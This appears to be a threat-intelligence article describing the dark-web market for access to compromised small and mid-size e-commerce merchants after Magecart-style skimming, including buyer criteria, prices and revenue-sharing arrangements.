orange arrow

E-Commerce Merchants: A Hot Commodity in the Dark Web

In recent years, cybercriminals implanted malicious skimming code directly on e-commerce shops and online content management and payment platforms as a way of stealing payment card data at scale. These attacks focused on identifying and exploiting vulnerabilities within these e-commerce platforms. With prominent victims such as British Airways, Ticketmaster, and Newegg, among others, this type of attack became known as “Magecart” and gained notoriety within information security circles and beyond. But as usual, this success brought about an increased focus by cybersecurity and e-commerce companies to identify “Magecart”-like vulnerabilities and improve detection and mitigation of such attacks.

In response, sharp cybercriminals turned to more targeted malware attacks of e-commerce merchants, particularly small to mid-size merchants. Their goal is to compromise the merchant’s payments processing account and steal all of the payment card data processed by the merchant. While the focus on small to mid-size merchants may seem counterintuitive, it is carefully designed to “fly below the radar” of larger and better-resourced merchants as well as financial institutions and card brands that tend to monitor larger merchants.

Consequently, in the first half of 2019, we have observed a spike in the demand for such compromised e-commerce merchant accounts in the Dark Web. Specifically, up until October 2018, there was only one prominent cybercriminal actively seeking to purchase access to compromised merchants from other hackers. In the first half of 2019, there are many more players active in this market, resulting in a booming market for compromised e-commerce merchants, with cybercriminals willing to pay as much as $20,000 per merchant. The demand is likely to continue growing, further fueling growth in CNP fraud. 

Market Dynamics

Most of the cybercriminals on the demand side are seeking to acquire access to compromised e-commerce merchants using widespread free content management systems such as Magento, Opencart, or osCommerce. In addition, these cybercriminals prefer those merchants that execute direct payment on their e-commerce site as opposed to merchants that redirect to payment gateways (i.e., to a secure payment page hosted by a payment service provider or IFrame). In the case of direct payments, the e-commerce server typically processes transaction, payment and customer data, allowing the cybercriminal to install malicious “sniffing” code that steals such data. More advanced  cybercriminals have also developed or obtained tools to extract such data from merchants that redirect payments to third parties, giving them a wider pool of merchants to pursue.

Buying access to compromised e-commerce merchants
Figure 1: A Russian-speaking cybercriminal buying access to compromised e-commerce merchants.

Typically, cybercriminals purchase the access to the compromised merchants from other cybercriminals, namely, hackers who have managed to infect these merchants with malware. Their skill sets are quite different – the “sellers” are technical operators skilled at running successful malware campaigns compromising merchants, whereas the “buyers” are fraudsters skilled at monetizing the compromised e-commerce merchants beginning with installing effective “sniffing” tools and ending with downstream fraud cash-outs. In certain cases, the “buyers” do not commit the payment card fraud directly; rather, they sell the compromised payment card data in Dark Web marketplaces. In fact, we have identified cybercriminals that recently launched such marketplaces to sell the compromised payment card data obtained from compromised e-commerce merchants.

Russian Speaking Table
Figure 2: Underground marketplace selling compromised payment card data

Prices for compromised merchants range between $300 to $20,000 per merchant, and are closely tied to the size and type of the merchant. For example, merchants selling luxury goods with high transaction volumes are valued greater than merchants selling moderately-priced goods with low transaction volumes. In many cases, the cybercriminals also enter into a partnership – no money is exchanged upfront, and they agree to share the proceeds from the fraud scheme.

Cybercriminals are eager to buy compromised merchants of almost every size. Often, the minimum requirement is that the merchant process 3-5 orders per day. The following is a comparison of several dominant cybercriminals targeting e-commerce merchants:

Buyer Active Since Merchant Criteria Business Model
Buyer 1 December 2016
  • Minimum 5 orders / day.
  • Excluding former Soviet Union countries.
  • Only direct payments merchants.
Paying $300 -$20,000 per merchant or up to 85% revenue share.
Buyer 2 October 2018
  • Minimum 3 orders / day.
  • Direct and redirect payments.
Paying $300 -$8,000 per merchant or up to 80% revenue share.
Buyer 3 February 2019
  • Excluding former Soviet Union countries, India, Brazil and Mexico.
  • Direct and redirect payments.
  • Purchase and revenue sharing.
  • Runs underground marketplace selling compromised payment cards.
Buyer 4 May 2019
  • Minimum 10 orders / day.
  • Direct and redirect payments.
  • 50/50 revenue sharing.
  • Runs underground marketplace selling compromised payment cards.